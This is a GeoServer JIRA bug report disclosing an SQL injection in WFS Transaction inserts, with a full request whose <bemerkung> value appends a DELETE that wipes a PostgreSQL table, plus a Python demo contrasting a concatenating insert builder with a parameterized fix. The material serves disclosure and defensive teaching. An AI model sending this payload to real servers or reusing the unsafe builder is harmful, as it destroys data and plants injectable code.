sql-injection
-------------
Key: GEOS-597
URL: http://jira.codehaus.org/browse/GEOS-597
Project: GeoServer
Type: Bug
Components: WFS
Reporter: Uli Rothstein
Assigned to: dblasby
Priority: Critical
We've tested the following SQL injection:
<bemerkung>
\',null,null,null,null,31467);delete from
f_lw_digi_flaechen;--
</bemerkung>
This injection deletes all datasets in the table f_lw_digi_flaechen in our postgres database.
(Geoserver-Version 1.3 RC2)
The complete request:
<wfs:Transaction version="1.0.0" service="WFS"
xmlns="http://www.someserver.com/myns"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:alk="http://zdkwh.mlrbw.net:8080/geoserver/namespace/alk"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.someserver.com/myns http://wms1.ccgis.de/geoserver-1.3-beta4/wfs/getCapabilities?request=describefeaturetype&typename=mapbender_user http://www.opengis.net/wfs../wfs/1.0.0/WFS-transaction.xsd">
<wfs:Insert>
<alk:f_lw_digi_flaechen>
<ud_id>0813</ud_id>
<meldevertreter_id>0813</meldevertreter_id>
<objekttyp_id>3</objekttyp_id>
<objekttyp_name>Landw. Nutzfl.</objekttyp_name>
<bemerkung>
\',null,null,null,null,31467);delete from
f_lw_digi_flaechen;--
</bemerkung>
<the_geom>
<gml:MultiPolygon srsName="epsg:31467">
<gml:polygonMember>
<gml:Polygon>
<gml:outerBoundaryIs>
<gml:LinearRing>
<gml:coordinates>
3472900,5464590 3472930,5464420
3472990,5464530 3472990,5464670
3472900,5464590
</gml:coordinates>
</gml:LinearRing>
</gml:outerBoundaryIs>
</gml:Polygon>
</gml:polygonMember>
</gml:MultiPolygon>
</the_geom>
</alk:f_lw_digi_flaechen>
</wfs:Insert>
</wfs:Transaction>
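The defect behind this report is an insert statement assembled by pasting WFS attribute values into SQL text. The following is an added example, not GeoServer code and not the reporter's: an in-memory SQLite database (a constructed stand-in for the PostgreSQL/PostGIS database in the report, with the geometry stored as plain text) is loaded with the table from the request, and the reported <bemerkung> value is inserted two ways. The vulnerable builder is only rendered to a string, so the reader can see that the value closes the VALUES list and appends a second statement; the hardened version checks attribute names against the feature type's column list and binds the values as parameters, after which the database stores the payload as an ordinary string and the existing rows survive. The function names, the column allow-list and the sample rows are assumptions made for the example. Escaping quote characters by hand is fragile because the rules differ between backends; binding parameters (JDBC PreparedStatement in a Java server) avoids building SQL text from attribute values at all.

```python
import sqlite3

# Constructed schema and sample rows standing in for the reporter's PostgreSQL
# table; SQLite has no geometry type, so the_geom is kept as text here.
SCHEMA = """
CREATE TABLE f_lw_digi_flaechen (
    ud_id TEXT, meldevertreter_id TEXT, objekttyp_id INTEGER,
    objekttyp_name TEXT, bemerkung TEXT, the_geom TEXT
);
INSERT INTO f_lw_digi_flaechen VALUES ('0001', '0001', 3, 'existing', '', 'POINT(0 0)');
INSERT INTO f_lw_digi_flaechen VALUES ('0002', '0002', 3, 'existing', '', 'POINT(1 1)');
"""

# Assumed allow-list of columns for this feature type. Identifiers cannot be
# bound as parameters, so attribute names are checked against the schema instead.
COLUMNS = ("ud_id", "meldevertreter_id", "objekttyp_id",
           "objekttyp_name", "bemerkung", "the_geom")

# The <bemerkung> value from the report, as the WFS Insert delivers it.
PAYLOAD = "\\',null,null,null,null,31467);delete from f_lw_digi_flaechen;--"

# Attribute values of the inserted feature, taken from the request above.
FEATURE = {
    "ud_id": "0813",
    "meldevertreter_id": "0813",
    "objekttyp_id": 3,
    "objekttyp_name": "Landw. Nutzfl.",
    "bemerkung": PAYLOAD,
    "the_geom": "MULTIPOLYGON(((3472900 5464590, 3472930 5464420, "
                "3472990 5464530, 3472990 5464670, 3472900 5464590)))",
}


def build_insert_unsafe(values):
    """Vulnerable pattern (hypothetical): attribute values pasted into SQL text.

    Returned as a string only, to show what would reach the database: the quote
    inside the payload closes the VALUES list and a second statement follows.
    """
    cols = ", ".join(values)
    vals = ", ".join(f"'{v}'" for v in values.values())
    return f"INSERT INTO f_lw_digi_flaechen ({cols}) VALUES ({vals});"


def insert_feature_safe(conn, values):
    """Hardened pattern: attribute names validated, values bound as parameters.

    Bound parameters never become part of the SQL text, so the database stores
    the payload as a plain string. The check on names runs before the
    connection is used.
    """
    unknown = set(values) - set(COLUMNS)
    if unknown:
        raise ValueError(f"unknown attribute(s): {sorted(unknown)}")
    cols = ", ".join(values)
    marks = ", ".join("?" for _ in values)
    conn.execute(
        f"INSERT INTO f_lw_digi_flaechen ({cols}) VALUES ({marks})",
        tuple(values.values()),
    )
    conn.commit()


def demo():
    """Insert the reported feature the safe way; return (row count, stored bemerkung)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    insert_feature_safe(conn, FEATURE)
    count = conn.execute("SELECT COUNT(*) FROM f_lw_digi_flaechen").fetchone()[0]
    stored = conn.execute(
        "SELECT bemerkung FROM f_lw_digi_flaechen WHERE ud_id = ?", ("0813",)
    ).fetchone()[0]
    conn.close()
    return count, stored


if __name__ == "__main__":
    print(build_insert_unsafe(FEATURE))  # shows the appended DELETE statement
    print(demo())                        # (3, PAYLOAD): rows intact, value stored literally
```

Running the block prints the concatenated statement with the `delete from f_lw_digi_flaechen` tail, then `(3, ...)` from the parameterized path: the two existing rows plus the new one, with the payload stored verbatim in `bemerkung`.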
--
This message is automatically generated by JIRA.